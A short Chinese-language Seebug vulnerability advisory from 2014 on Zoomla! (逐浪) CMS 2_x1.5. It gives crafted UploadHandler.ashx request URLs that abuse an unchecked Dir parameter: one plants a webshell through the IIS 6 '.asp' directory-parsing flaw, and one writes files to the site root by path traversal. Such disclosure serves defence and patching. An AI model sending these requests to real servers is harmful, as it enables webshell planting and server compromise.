逐浪CMS一个漏洞的各种拿Shell姿势(系统环境限制)

2014-05-09T00:00:00
ID SSV:94221
Type seebug
Reporter Root
Modified 2014-05-09T00:00:00

Description

简要描述:

文件目录随意保存影响版本:包含此文件的版本均受影响 拿Shell影响版本:包含此文件的版本均受影响 仅是(IIS6.0) 依官网最新版本为测试对象 Zoomla!CMS2_x1.5

详细说明:

首先还是问题出现的部分
文件

None

Dir则为目录参数 那么可以简单的构造成 http://192.168.10.19:9992/User/UploadHandler.ashx?content=aaaaaaaaa&Dir=.asp

    上传得到SHell 地址为Domain/UploadFiles/用户名/.asp/文件名

<img src="https://images.seebug.org/upload/201405/09184534b71b51415110bf8da9599ebcbb9480ef.jpg" alt="4-4.JPG" width="600" onerror="javascript:errimg(this);">

另外文件可以随意保存 只要将目录更改为http://192.168.10.19:9992/User/UploadHandler.ashx?content=aaaaaaaaa&Dir=../../ 即可(保存到根目录)

<img src="https://images.seebug.org/upload/201405/091846340f94210def9755a748eed2eef7173f0a.jpg" alt="5-5.JPG" width="600" onerror="javascript:errimg(this);">

漏洞证明: